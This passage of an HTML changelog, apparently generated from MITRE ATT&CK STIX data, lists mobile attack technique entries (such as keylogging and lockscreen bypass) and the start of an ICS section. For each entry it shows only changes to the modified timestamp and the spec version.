Permissions</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:08.587000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1407] Download New Code at Runtime</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:55.445000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1627] Execution Guardrails</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:44.210000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1646] Exfiltration Over C2 Channel</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:36.720000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1639.001] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:38.977000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1630.002] Indicator Removal on Host: File Deletion</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:12.849000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1420] File and Directory Discovery</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:24.899000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1541] Foreground Persistence</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:52.197000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.636000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1417.002] Input Capture: GUI Input Capture</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:45.045000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1544] Ingress Tool Transfer</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:34.355000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1516] Input Injection</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:25.635000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1417.001] Input Capture: Keylogging</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:14.276000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1430] Location Tracking</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:08.214000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1461] Lockscreen Bypass</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:29.764000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1655] Masquerading</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:38.098000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.725000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1655.001] Masquerading: Match Legitimate Name or Location</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 21:21:44.590000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1575] Native API</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:47.482000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1406] Obfuscated Files or Information</h4><p><b>Current version</b>: 3.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:25.462000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1660] Phishing</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 17:38:10.545000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1629.001] Impair Defenses: Prevent Application Removal</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:28.687000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.721000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1582] SMS Control</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:15.008000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1636.004] Protected User Data: SMS Messages</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:22.003000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.715000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1513] Screen Capture</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:57.610000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1418] Software Discovery</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:27.789000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1406.002] Obfuscated Files or Information: Software Packing</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:46.514000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.632000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1409] Stored Application Data</h4><p><b>Current version</b>: 3.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:56.509000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1426] System Information Discovery</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:31.141000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1422] System Network Configuration Discovery</h4><p><b>Current version</b>: 2.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:26.973000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1630.001] Indicator Removal on Host: Uninstall Malicious Application</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:23.278000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1628.002] Hide Artifacts: User Evasion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:32.337000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1512] Video Capture</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:28.248000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.721000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1437.001] Application Layer Protocol: Web Protocols</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:31.318000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1422.002] System Network Configuration Discovery: Wi-Fi Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-02-21 20:44:44.404000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[T0800] Activate Firmware Update Mode</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 15:16:44.679000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: 